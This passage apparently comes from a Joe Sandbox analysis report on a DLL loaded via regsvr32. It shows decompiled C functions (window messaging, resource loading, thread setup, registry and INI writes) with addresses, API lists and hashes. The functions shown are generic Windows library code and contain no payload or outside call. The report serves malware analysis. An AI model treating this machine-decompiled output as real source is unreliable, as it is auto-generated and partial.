							__eflags = 1;
						} else {
							_t20 = 0;
						}
						SendMessageA( *( *((intOrPtr*)(_t44 + 0x10)) + 0x20), 0x36d, 4 + (0 | _t20 == 0x00000000) * 4, 0);
					}
					return 1;
				}
				return _t12;
			}














                                                                                                                0x100423b4
                                                                                                                0x100423b4
                                                                                                                0x100423b6
                                                                                                                0x100423b8
                                                                                                                0x100423bc
                                                                                                                0x100423c3
                                                                                                                0x100423d5
                                                                                                                0x100423d7
                                                                                                                0x100423de
                                                                                                                0x100423e0
                                                                                                                0x100423e2
                                                                                                                0x100423e4
                                                                                                                0x100423e4
                                                                                                                0x100423e9
                                                                                                                0x100423ea
                                                                                                                0x100423fd
                                                                                                                0x10042406
                                                                                                                0x1004242f
                                                                                                                0x1004242f
                                                                                                                0x10042429
                                                                                                                0x10042429
                                                                                                                0x10042429
                                                                                                                0x10042449
                                                                                                                0x1004244c
                                                                                                                0x00000000
                                                                                                                0x10042450
                                                                                                                0x10042453

                                                                                                                APIs
                                                                                                                  • Part of subcall function 100177F8: GetWindowLongA.USER32(?,000000F0), ref: 10017803
                                                                                                                • GetForegroundWindow.USER32 ref: 100423EB
                                                                                                                • GetLastActivePopup.USER32(?), ref: 1004240B
                                                                                                                • SendMessageA.USER32 ref: 10042423
                                                                                                                • SendMessageA.USER32 ref: 10042449
                                                                                                                  • Part of subcall function 1000A069: __CxxThrowException@8.LIBCMT ref: 1000A07D
                                                                                                                  • Part of subcall function 1000A069: __EH_prolog3.LIBCMT ref: 1000A08A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSendWindow$ActiveException@8ForegroundH_prolog3LastLongPopupThrow
                                                                                                                • String ID:
                                                                                                                • API String ID: 2019557511-0
                                                                                                                • Opcode ID: 41cb334477f83e6732df50886b9816101e4f0b09da1f08f8e6342bbf09e318ee
                                                                                                                • Instruction ID: 2b7d243d7015231387084009200a1c3232ee3d90a970c4ee94a08bcaeb9e426e
                                                                                                                • Opcode Fuzzy Hash: 41cb334477f83e6732df50886b9816101e4f0b09da1f08f8e6342bbf09e318ee
                                                                                                                • Instruction Fuzzy Hash: AA012BB6710215ABE701F7759C41F6E32ACDB887D5F114579F941C7060DA71DC018669
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1001BB0D Relevance: 6.1, APIs: 4, Instructions: 57COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 90%
                                                                                                                			E1001BB0D(void* __ecx) {
				void* _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t23;
				void* _t28;
				void* _t30;
				struct HINSTANCE__* _t32;
				signed int _t34;
				signed short _t35;
				void* _t37;
				signed short* _t40;

				_push(__ecx);
				_push(_t28);
				_t37 = __ecx;
				_t42 =  *((intOrPtr*)(__ecx + 0x58));
				_t40 =  *(__ecx + 0x60);
				_v8 =  *((intOrPtr*)(__ecx + 0x5c));
				if( *((intOrPtr*)(__ecx + 0x58)) != 0) {
					_t32 =  *(E1001E302(_t28, __ecx, _t40, _t42) + 0xc);
					_v8 = LoadResource(_t32, FindResourceA(_t32,  *(_t37 + 0x58), 5));
				}
				if(_v8 != 0) {
					_t40 = LockResource(_v8);
				}
				_t30 = 1;
				if(_t40 != 0) {
					_t35 =  *_t40;
					if(_t40[1] != 0xffff) {
						_t23 = _t40[5] & 0x0000ffff;
						_t34 = _t40[6] & 0x0000ffff;
					} else {
						_t35 = _t40[6];
						_t23 = _t40[9] & 0x0000ffff;
						_t34 = _t40[0xa] & 0x0000ffff;
					}
					if((_t35 & 0x00001801) != 0 || _t23 != 0 || _t34 != 0) {
						_t30 = 0;
					}
				}
				if( *(_t37 + 0x58) != 0) {
					FreeResource(_v8);
				}
				return _t30;
			}
















                                                                                                                0x1001bb10
                                                                                                                0x1001bb11
                                                                                                                0x1001bb14
                                                                                                                0x1001bb16
                                                                                                                0x1001bb1d
                                                                                                                0x1001bb20
                                                                                                                0x1001bb23
                                                                                                                0x1001bb2a
                                                                                                                0x1001bb41
                                                                                                                0x1001bb41
                                                                                                                0x1001bb48
                                                                                                                0x1001bb53
                                                                                                                0x1001bb53
                                                                                                                0x1001bb57
                                                                                                                0x1001bb5a
                                                                                                                0x1001bb62
                                                                                                                0x1001bb64
                                                                                                                0x1001bb73
                                                                                                                0x1001bb77
                                                                                                                0x1001bb66
                                                                                                                0x1001bb66
                                                                                                                0x1001bb69
                                                                                                                0x1001bb6d
                                                                                                                0x1001bb6d
                                                                                                                0x1001bb80
                                                                                                                0x1001bb8c
                                                                                                                0x1001bb8c
                                                                                                                0x1001bb80
                                                                                                                0x1001bb92
                                                                                                                0x1001bb97
                                                                                                                0x1001bb97
                                                                                                                0x1001bba3

                                                                                                                APIs
                                                                                                                • FindResourceA.KERNEL32 ref: 1001BB33
                                                                                                                • LoadResource.KERNEL32(?,00000000), ref: 1001BB3B
                                                                                                                • LockResource.KERNEL32(00000000), ref: 1001BB4D
                                                                                                                • FreeResource.KERNEL32(00000000), ref: 1001BB97
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Resource$FindFreeLoadLock
                                                                                                                • String ID:
                                                                                                                • API String ID: 1078018258-0
                                                                                                                • Opcode ID: 21390bd7aac50927cd41fd487d0f740c7bdb04cca7142f3f17de887c8a18310c
                                                                                                                • Instruction ID: 0eb972119714696451402e669bdf57dc20bcf58fed3d00780577fdfd15a11bb1
                                                                                                                • Opcode Fuzzy Hash: 21390bd7aac50927cd41fd487d0f740c7bdb04cca7142f3f17de887c8a18310c
                                                                                                                • Instruction Fuzzy Hash: 3711BF74504B15EFD710DF51C8C9BAAB3F8FF012A5F108059E94257954D3B4ED80DBA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10019C28 Relevance: 6.1, APIs: 4, Instructions: 56threadCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 95%
                                                                                                                			E10019C28(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t37;
				intOrPtr _t43;
				void* _t45;
				intOrPtr* _t51;
				void* _t52;
				void* _t53;

				_t53 = __eflags;
				_t46 = __ecx;
				_t44 = __ebx;
				_push(4);
				E1004764D(0x1008ed88, __ebx, __edi, __esi);
				_t51 = __ecx;
				 *((intOrPtr*)(_t52 - 0x10)) = __ecx;
				E1001A40B(__ebx, __ecx, __edi, __ecx, _t53);
				_t54 =  *((intOrPtr*)(_t52 + 8));
				 *((intOrPtr*)(_t52 - 4)) = 0;
				 *_t51 = 0x1009c6f4;
				if( *((intOrPtr*)(_t52 + 8)) == 0) {
					 *((intOrPtr*)(_t51 + 0x50)) = 0;
				} else {
					_t43 = E1004C810( *((intOrPtr*)(_t52 + 8)));
					_pop(_t46);
					 *((intOrPtr*)(_t51 + 0x50)) = _t43;
				}
				_t45 = E1001E302(_t44, 0, _t51, _t54);
				_t55 = _t45;
				if(_t45 == 0) {
					L4:
					E1000A069(_t45, _t46, 0, _t51, _t55);
				}
				_t7 = _t45 + 0x74; // 0x74
				_t46 = _t7;
				_t37 = E1001988F(_t45, _t7, 0, _t51, _t55);
				if(_t37 == 0) {
					goto L4;
				}
				 *((intOrPtr*)(_t37 + 4)) = _t51;
				 *((intOrPtr*)(_t51 + 0x2c)) = GetCurrentThread();
				 *((intOrPtr*)(_t51 + 0x30)) = GetCurrentThreadId();
				 *((intOrPtr*)(_t45 + 4)) = _t51;
				 *((intOrPtr*)(_t51 + 0x44)) = 0;
				 *((intOrPtr*)(_t51 + 0x7c)) = 0;
				 *((intOrPtr*)(_t51 + 0x64)) = 0;
				 *((intOrPtr*)(_t51 + 0x68)) = 0;
				 *((intOrPtr*)(_t51 + 0x54)) = 0;
				 *((intOrPtr*)(_t51 + 0x60)) = 0;
				 *((intOrPtr*)(_t51 + 0x88)) = 0;
				 *((intOrPtr*)(_t51 + 0x58)) = 0;
				 *((short*)(_t51 + 0x92)) = 0;
				 *((short*)(_t51 + 0x90)) = 0;
				 *((intOrPtr*)(_t51 + 0x48)) = 0;
				 *((intOrPtr*)(_t51 + 0x8c)) = 0;
				 *((intOrPtr*)(_t51 + 0x80)) = 0;
				 *((intOrPtr*)(_t51 + 0x84)) = 0;
				 *((intOrPtr*)(_t51 + 0x70)) = 0;
				 *((intOrPtr*)(_t51 + 0x74)) = 0;
				 *((intOrPtr*)(_t51 + 0x94)) = 0;
				 *((intOrPtr*)(_t51 + 0x9c)) = 0;
				 *((intOrPtr*)(_t51 + 0x5c)) = 0;
				 *((intOrPtr*)(_t51 + 0x6c)) = 0;
				 *((intOrPtr*)(_t51 + 0x98)) = 0x200;
				return E10047725(_t51);
			}









                                                                                                                0x10019c28
                                                                                                                0x10019c28
                                                                                                                0x10019c28
                                                                                                                0x10019c28
                                                                                                                0x10019c2f
                                                                                                                0x10019c34
                                                                                                                0x10019c36
                                                                                                                0x10019c39
                                                                                                                0x10019c40
                                                                                                                0x10019c43
                                                                                                                0x10019c46
                                                                                                                0x10019c4c
                                                                                                                0x10019c5c
                                                                                                                0x10019c4e
                                                                                                                0x10019c51
                                                                                                                0x10019c56
                                                                                                                0x10019c57
                                                                                                                0x10019c57
                                                                                                                0x10019c64
                                                                                                                0x10019c66
                                                                                                                0x10019c68
                                                                                                                0x10019c6a
                                                                                                                0x10019c6a
                                                                                                                0x10019c6a
                                                                                                                0x10019c6f
                                                                                                                0x10019c6f
                                                                                                                0x10019c72
                                                                                                                0x10019c79
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10019c7b
                                                                                                                0x10019c84
                                                                                                                0x10019c8d
                                                                                                                0x10019c90
                                                                                                                0x10019c93
                                                                                                                0x10019c96
                                                                                                                0x10019c99
                                                                                                                0x10019c9c
                                                                                                                0x10019c9f
                                                                                                                0x10019ca2
                                                                                                                0x10019ca5
                                                                                                                0x10019cab
                                                                                                                0x10019cae
                                                                                                                0x10019cb5
                                                                                                                0x10019cbc
                                                                                                                0x10019cbf
                                                                                                                0x10019cc5
                                                                                                                0x10019ccb
                                                                                                                0x10019cd1
                                                                                                                0x10019cd4
                                                                                                                0x10019cd7
                                                                                                                0x10019cdd
                                                                                                                0x10019ce3
                                                                                                                0x10019ce6
                                                                                                                0x10019ce9
                                                                                                                0x10019cfa

                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 10019C2F
                                                                                                                  • Part of subcall function 1001A40B: __EH_prolog3.LIBCMT ref: 1001A412
                                                                                                                • __strdup.LIBCMT ref: 10019C51
                                                                                                                • GetCurrentThread.KERNEL32(00000004,10002EB9,00000000), ref: 10019C7E
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 10019C87
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CurrentH_prolog3Thread$__strdup
                                                                                                                • String ID:
                                                                                                                • API String ID: 4206445780-0
                                                                                                                • Opcode ID: c3b3984c62bacbd36d5cc92ad9ca2300cd357f5d6ec69e28e01614a3e862823a
                                                                                                                • Instruction ID: 08193193464e78a0f338aeecd604293388332540e588b7c863b14edbaf8c935c
                                                                                                                • Opcode Fuzzy Hash: c3b3984c62bacbd36d5cc92ad9ca2300cd357f5d6ec69e28e01614a3e862823a
                                                                                                                • Instruction Fuzzy Hash: 882190B0800B508FD321DF2A854524AFBE8FFA0740F10891FE5AA87622CBB0A481DF44
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10043F4D Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 86%
                                                                                                                			E10043F4D(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				int _v8;
				int _t21;
				intOrPtr _t32;
				int _t36;
				void* _t46;

				_push(__ecx);
				_push(__ecx);
				_t46 = __ecx;
				_t36 = _a4 -  *((intOrPtr*)(__ecx + 4));
				_t21 = _a8 -  *((intOrPtr*)(__ecx + 8));
				_v8 = _t21;
				OffsetRect(__ecx + 0x28, _t36, _t21);
				OffsetRect(_t46 + 0x48, _t36, _v8);
				OffsetRect(_t46 + 0x38, _t36, _v8);
				OffsetRect(_t46 + 0x58, _t36, _v8);
				_t48 =  *((intOrPtr*)(_t46 + 0x80));
				 *((intOrPtr*)(_t46 + 4)) = _a4;
				 *((intOrPtr*)(_t46 + 8)) = _a8;
				if( *((intOrPtr*)(_t46 + 0x80)) == 0) {
					_t32 = E100439DF();
				} else {
					_t32 = 0;
				}
				 *((intOrPtr*)(_t46 + 0x74)) = _t32;
				return E10043DEE(_t46, _t48, 0);
			}








                                                                                                                0x10043f50
                                                                                                                0x10043f51
                                                                                                                0x10043f57
                                                                                                                0x10043f5f
                                                                                                                0x10043f6b
                                                                                                                0x10043f6e
                                                                                                                0x10043f76
                                                                                                                0x10043f80
                                                                                                                0x10043f8a
                                                                                                                0x10043f94
                                                                                                                0x10043f96
                                                                                                                0x10043fa0
                                                                                                                0x10043fa6
                                                                                                                0x10043fa9
                                                                                                                0x10043fb1
                                                                                                                0x10043fab
                                                                                                                0x10043fab
                                                                                                                0x10043fab
                                                                                                                0x10043fba
                                                                                                                0x10043fc6

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: OffsetRect
                                                                                                                • String ID:
                                                                                                                • API String ID: 177026234-0
                                                                                                                • Opcode ID: 10ba8cf307fc1ee194453d2be39fa243ce68c423d7bb49e5b94edb7717c06be9
                                                                                                                • Instruction ID: ad087f104e08c8dc69baa1358e980ee4299902bd1e2e8011736340b443768c7d
                                                                                                                • Opcode Fuzzy Hash: 10ba8cf307fc1ee194453d2be39fa243ce68c423d7bb49e5b94edb7717c06be9
                                                                                                                • Instruction Fuzzy Hash: 19110C71A00709AFDB10DFA9C985D9BB7ECEB48254B10882AF54AD7610D670FE449B60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10025FFB Relevance: 6.1, APIs: 4, Instructions: 55registryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 94%
                                                                                                                			E10025FFB(void* __ecx, intOrPtr __edx, CHAR* _a4, char* _a8, char _a12) {
				signed int _v8;
				char _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t13;
				CHAR* _t21;
				char* _t24;
				intOrPtr _t28;
				void* _t30;
				signed int _t31;

				_t28 = __edx;
				_t13 =  *0x100b9e70; // 0xbb35530
				_v8 = _t13 ^ _t31;
				_t24 = _a8;
				_t30 = __ecx;
				_t29 = _a4;
				if( *((intOrPtr*)(__ecx + 0x54)) == 0) {
					E1004C19A( &_v24, 0x10, 0x1009d478, _a12);
					_t18 = WritePrivateProfileStringA(_t29, _t24,  &_v24,  *(__ecx + 0x68));
				} else {
					_t30 = E10025F4C(__ecx, _t29);
					if(_t30 != 0) {
						_t21 = RegSetValueExA(_t30, _t24, 0, 4,  &_a12, 4);
						_t29 = _t21;
						RegCloseKey(_t30);
						_t18 = 0 | _t21 == 0x00000000;
					}
				}
				return E1004763E(_t18, _t24, _v8 ^ _t31, _t28, _t29, _t30);
			}














                                                                                                                0x10025ffb
                                                                                                                0x10026001
                                                                                                                0x10026008
                                                                                                                0x1002600c
                                                                                                                0x10026010
                                                                                                                0x10026017
                                                                                                                0x1002601a
                                                                                                                0x1002605a
                                                                                                                0x1002606b
                                                                                                                0x1002601c
                                                                                                                0x10026022
                                                                                                                0x10026026
                                                                                                                0x10026034
                                                                                                                0x1002603b
                                                                                                                0x1002603d
                                                                                                                0x10026047
                                                                                                                0x10026047
                                                                                                                0x10026026
                                                                                                                0x1002607f

                                                                                                                APIs
                                                                                                                • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 10026034
                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 1002603D
                                                                                                                • _swprintf.LIBCMT ref: 1002605A
                                                                                                                • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 1002606B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClosePrivateProfileStringValueWrite_swprintf
                                                                                                                • String ID:
                                                                                                                • API String ID: 4210924919-0
                                                                                                                • Opcode ID: ecc0c1e1ae1d5184763d5de5863195a65147cc483bfe43b30b9c9aca3f2aaf1c
                                                                                                                • Instruction ID: e1688f579dca54ba37b2dca936e62701f3f568ae60a6af65198550ab68664cd0
                                                                                                                • Opcode Fuzzy Hash: ecc0c1e1ae1d5184763d5de5863195a65147cc483bfe43b30b9c9aca3f2aaf1c
                                                                                                                • Instruction Fuzzy Hash: B001A976500219ABEB10EF688D81FAFB3ACEB09604F50056AFA01E7181DA74FD0497A4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100163C0 Relevance: 6.1, APIs: 4, Instructions: 55windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 84%
                                                                                                                			E100163C0(intOrPtr* __ecx) {
				char _v20;
				intOrPtr _v32;
				void* __ebx;
				void* __edi;
				intOrPtr* __esi;
				struct HWND__* _t18;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t33;

				_t28 = __ecx;
				_push(0);
				_t33 = __ecx;
				if( *((intOrPtr*)( *__ecx + 0x120))() != 0) {
					__eax =  *__esi;
					__ecx = __esi;
					__eax =  *((intOrPtr*)( *__esi + 0x170))();
				}
				_t30 = SendMessageA;
				SendMessageA( *(_t33 + 0x20), 0x1f, 0, 0);
				E10014BE6(0, _t28,  *(_t33 + 0x20), 0x1f, 0, 0, 1, 1);
				_t28 = _t33;
				_t33 = E10015912(0, _t28, SendMessageA);
				if(_t33 != 0) {
					SendMessageA( *(_t33 + 0x20), 0x1f, 0, 0);
					E10014BE6(0, _t28,  *(_t33 + 0x20), 0x1f, 0, 0, 1, 1);
					_t18 = GetCapture();
					if(_t18 != 0) {
						_t18 = SendMessageA(_t18, 0x1f, 0, 0);
					}
					return _t18;
				} else {
					_push(_t28);
					_v20 = 0x100b8618;
					L10048E48( &_v20, 0x100aff30);
					asm("int3");
					_push(4);
					E1004764D(0x1008dd26, 0, SendMessageA, _t33);
					_t29 = E10020454(0x104);
					_v32 = _t29;
					_t24 = 0;
					_v20 = 0;
					if(_t29 != 0) {
						_t24 = E1001DB72(_t29);
					}
					return E10047725(_t24);
				}
			}












                                                                                                                0x100163c0
                                                                                                                0x100163c0
                                                                                                                0x100163c2
                                                                                                                0x100163cf
                                                                                                                0x100163d1
                                                                                                                0x100163d3
                                                                                                                0x100163d5
                                                                                                                0x100163d5
                                                                                                                0x100163db
                                                                                                                0x100163ea
                                                                                                                0x100163f7
                                                                                                                0x100163fc
                                                                                                                0x10016403
                                                                                                                0x10016407
                                                                                                                0x10016415
                                                                                                                0x10016422
                                                                                                                0x10016427
                                                                                                                0x1001642f
                                                                                                                0x10016436
                                                                                                                0x10016436
                                                                                                                0x1001643b
                                                                                                                0x10016409
                                                                                                                0x1000a06c
                                                                                                                0x1000a076
                                                                                                                0x1000a07d
                                                                                                                0x1000a082
                                                                                                                0x1000a083
                                                                                                                0x1000a08a
                                                                                                                0x1000a099
                                                                                                                0x1000a09b
                                                                                                                0x1000a09e
                                                                                                                0x1000a0a2
                                                                                                                0x1000a0a5
                                                                                                                0x1000a0a7
                                                                                                                0x1000a0a7
                                                                                                                0x1000a0b1
                                                                                                                0x1000a0b1

                                                                                                                APIs
                                                                                                                • SendMessageA.USER32 ref: 100163EA
                                                                                                                • SendMessageA.USER32 ref: 10016415
                                                                                                                  • Part of subcall function 10014BE6: GetTopWindow.USER32(?), ref: 10014BF4
                                                                                                                • GetCapture.USER32 ref: 10016427
                                                                                                                • SendMessageA.USER32 ref: 10016436
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$CaptureWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 729421689-0
                                                                                                                • Opcode ID: a0efcb6364b0c9d389cf4b23c1236720dfbb6099423cd28568ba9601b1c5d6f1
                                                                                                                • Instruction ID: 614349e7e5f11e2e6eee7cd7448c617cf19cc0822f6615fa638ab2828d8a9c26
                                                                                                                • Opcode Fuzzy Hash: a0efcb6364b0c9d389cf4b23c1236720dfbb6099423cd28568ba9601b1c5d6f1
                                                                                                                • Instruction Fuzzy Hash: 420184B5354619BFF6306B208CC9FBA76ADFB8C785F020174F285AA1A2C6A1DC405560
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1001CB39 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 91%
                                                                                                                			E1001CB39(intOrPtr* __ecx, intOrPtr _a4, CHAR* _a8, intOrPtr _a12) {
				void* _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t18;
				struct HRSRC__* _t25;
				void* _t28;
				intOrPtr* _t34;
				void* _t36;
				intOrPtr _t37;
				struct HINSTANCE__* _t39;

				_push(__ecx);
				_t28 = 0;
				_t40 = _a8;
				_push(_t36);
				_t34 = __ecx;
				_v8 = 0;
				if(_a8 == 0) {
					L4:
					_t37 = _a4;
					_a8 = 1;
					if(_t28 != 0) {
